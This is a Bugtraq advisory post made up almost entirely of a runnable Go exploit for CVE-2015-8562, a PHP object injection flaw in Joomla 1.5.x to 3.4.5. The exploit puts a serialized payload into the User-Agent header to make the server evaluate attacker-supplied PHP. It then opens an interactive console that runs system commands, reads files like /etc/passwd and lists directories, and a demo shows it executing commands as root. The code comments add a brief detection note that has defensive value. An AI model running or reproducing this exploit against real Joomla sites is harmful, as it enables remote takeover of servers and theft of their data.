Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)

From: irancrash@gmail.com
To: bugtraq@securityfocus.com
Cc:
Subject: Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)
Date:


package main

/*
**************************************************************************
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
**************************************************************************
* THIS EXPLOIT IS PUBLISHED ONLY FOR EDUCATIONAL PURPOSES; ANY ILLEGAL USAGE
*                     IS ON YOUR OWN RESPONSIBILITY
**************************************************************************
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**************************************************************************
* DEMO :

$ ./exploit 192.168.1.113/joomla
###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###############################################

Attacking to  http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH                       read file from FILEPATH
dir DIRPATH                 list directory in DIRPATH
exec COMMAND                      execute system command
eval phpcode                 evaluate PHP Code
help                              display this help
exit                              close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')


root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$

 */

import (
     "fmt"
    "net/http"
       "regexp"
 "os"
     "io/ioutil"
      "bytes"
  "net/http/cookiejar"
     "net/url"
        "bufio"
  "strings"
)


// target is the base URL of the Joomla installation the tool posts to. main
// fills it from the first command-line argument and normalises it to start
// with http:// and end with "/".
var target string;


// helpString is the interactive console help printed by main (also shown
// verbatim in the DEMO section of the file header).
var helpString=`# Command Line Documentation :
read FILEPATH                       read file from FILEPATH
dir DIRPATH                 list directory in DIRPATH
exec COMMAND                      execute system command
eval phpcode                 evaluate PHP Code
help                              display this help
exit                              close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')

`

// validHttpUrl matches arguments that already carry an http:// or https://
// scheme; main prepends http:// to anything that does not.
var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")

// resultRegex locates the "iMH3r3=" marker that newRequest's echo() places in
// front of the script output and captures everything after it, newlines
// included ((?s) makes "." match "\n").
var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")

// cmdRegex splits a console line into a command word (group 1) and the rest
// of the line (group 2). A line with no space after the word does not match.
var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")

// newLine matches CR and LF; main strips them from each console line.
var newLine=regexp.MustCompile("[\\n\\r]")

// client is the shared HTTP client created in main with a cookie jar. It is
// created without a Timeout, so a non-responding host blocks the console.
var client *http.Client

// newRequest builds the POST request the tool sends to target for one PHP
// snippet. The snippet is placed in form field "1", prefixed with
// echo('iMH3r3=') so that runCommand and confirm can find the script output
// in the response with resultRegex. The User-Agent header carries a
// serialized PHP object graph (the CVE-2015-8562 object-injection payload
// from the file header; its feed_url member contains eval($_POST[1])),
// followed by the non-UTF-8 bytes \xf0\xfd\xfd\xfd.
//
// Detection note: a User-Agent containing PHP serialization syntax such as
// O:21:"JDatabaseDriverMysqli" or disconnectHandlers, or bytes that are not
// valid UTF-8, is a strong indicator of this exploit in web-server and WAF
// logs. Per the header, Joomla 1.5.x through 3.4.5 are affected; Joomla
// 3.4.6 and later together with a PHP release carrying the corresponding fix
// are not (confirm treats an HTTP 500 as the patched-PHP case).
func newRequest(command string) *http.Request{
	values:=url.Values{}
	values.Set("1","echo('iMH3r3=');"+command+";")

	// NewRequest only fails when target is not a usable URL; the tool treats
	// that as fatal rather than reporting it to the console.
	req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))

	if err!=nil{
		panic(err)
	}

	req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	return req
}


// escape backslash-escapes every single quote in str so the caller can embed
// it inside a single-quoted PHP string literal. Only the quote character is
// rewritten; every other byte is copied through unchanged.
func escape(str string) string {
	var out strings.Builder
	out.Grow(len(str))
	// Iterate bytes, not runes, so invalid UTF-8 in str is preserved as-is.
	for i := 0; i < len(str); i++ {
		c := str[i]
		if c == '\'' {
			out.WriteString(`\'`)
			continue
		}
		out.WriteByte(c)
	}
	return out.String()
}


// runCommand sends one PHP snippet via newRequest and prints whatever the
// server echoed after the iMH3r3= marker. A transport error is printed and
// the call returns; a body-read error is printed but the (partial) body is
// still searched. The HTTP status code is not checked, so any response that
// contains the marker is printed regardless of status.
func runCommand(command string){
	res,err:=client.Do(newRequest(command))

	if err!=nil{
		fmt.Println(err.Error())
	}else{
		defer res.Body.Close()
		resBytes,err:=ioutil.ReadAll(res.Body)
		str:=string(resBytes)

		if err!=nil{
			fmt.Println(err)
		}
		match:=resultRegex.FindStringSubmatch(str)
		if len(match)>0{
			// match[0] begins with the 7-byte marker "iMH3r3="; skipping it
			// leaves only the script output (the same text as match[1]).
			fmt.Print(match[0][7:])
		}
	}

}


// confirm sends an empty snippet and reports whether the iMH3r3= marker comes
// back, i.e. whether the server executed the injected PHP. An HTTP 500 is
// taken to mean the PHP side is patched and yields false; note that on that
// path the response body is never closed (main returns shortly afterwards,
// so the leak is short-lived). A transport error is printed and yields
// false; a body-read error is printed and the partial body is still checked.
func confirm() bool{
	res,err:=client.Do(newRequest(""))

	if err!=nil{
		fmt.Println(err)
		return false
	}else{
		if res.StatusCode==500{
			fmt.Println("Patched PHP Version :( !")
			return false
		}
		defer res.Body.Close()
		resBytes,err:=ioutil.ReadAll(res.Body)
		str:=string(resBytes)

		if err!=nil{
			fmt.Println(err)
		}
		match:=resultRegex.FindStringSubmatch(str)
		if len(match)>0{
			return true
		}else{
			return false
		}
	}
}

// main prints the banner, builds the shared HTTP client, normalises the target
// URL from os.Args[1], probes the target with confirm, and on success runs an
// interactive console that maps "read"/"dir"/"exec"/"eval" lines onto PHP
// snippets for runCommand. "exit" returns; any other unrecognised line prints
// the help text.
func main(){
	fmt.Print(`###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.0 to 3.4.5
###############################################
`)
	options := cookiejar.Options{}

	// The jar keeps whatever cookies the target sets, so later requests from
	// this client are sent with the same session.
	jar, err := cookiejar.New(&options)
	if err != nil {
		panic(err)
	}

	client = &http.Client{
		Jar:jar,
	}



	if len(os.Args)<2{
		fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")
		return
	}

	target=os.Args[1]
	if(!validHttpUrl.MatchString(target)){
		target="http://"+target
	}

	// Joomla is addressed at the directory root, so ensure a trailing slash.
	if string(target[len(target)-1])!="/"{
		target+="/"
	}

	fmt.Println("Attacking to ",target)


	// First request: its response is drained and discarded; any session cookie
	// it sets stays in the jar, and confirm below sends a second request with
	// that cookie. The ReadAll error is ignored here.
	res,err:=client.Do(newRequest(""))
	if err!=nil{
		fmt.Println("Request Error:",err)
		return
	}
	ioutil.ReadAll(res.Body)
	res.Body.Close()

	if confirm(){
		fmt.Println("Target is vulnerable !")
		//runCommand("system('ls -la')")
		stdinreader := bufio.NewReader(os.Stdin)

		fmt.Println(helpString)
		for {
			var line string
			fmt.Print("root@joomla:$ ")
			// The read error is dropped: at EOF ReadString returns "" every
			// time, so the loop keeps printing "Wrong input !" and the help
			// until the process is interrupted.
			line,_=stdinreader.ReadString('\n')
			line=newLine.ReplaceAllString(line,"")
			match:=cmdRegex.FindStringSubmatch(line)
			if len(match)<3 {
				if (line=="exit"){
					return
				}

				if !(line=="help"){
					fmt.Println("Wrong input !")
				}

				fmt.Println(helpString)
			}else{
				cmd:=match[1]
				// Arguments are embedded in single-quoted PHP strings, so only
				// the quote is escaped (see escape). "eval" bypasses this and
				// sends match[2] as raw PHP.
				input:=escape(match[2])
				switch cmd {
				case "exec":
					runCommand("system('"+input+"')")
				case "read":
					runCommand("readfile('"+input+"')")
				case "dir":
					runCommand("$a=scandir('"+input+"');foreach($a as $v){echo $v.\"\\n\";}")
				case "eval":
					runCommand(match[2])
				}
			}
		}
	}else{
		fmt.Println("Target is not vulnerable!")
	}


}




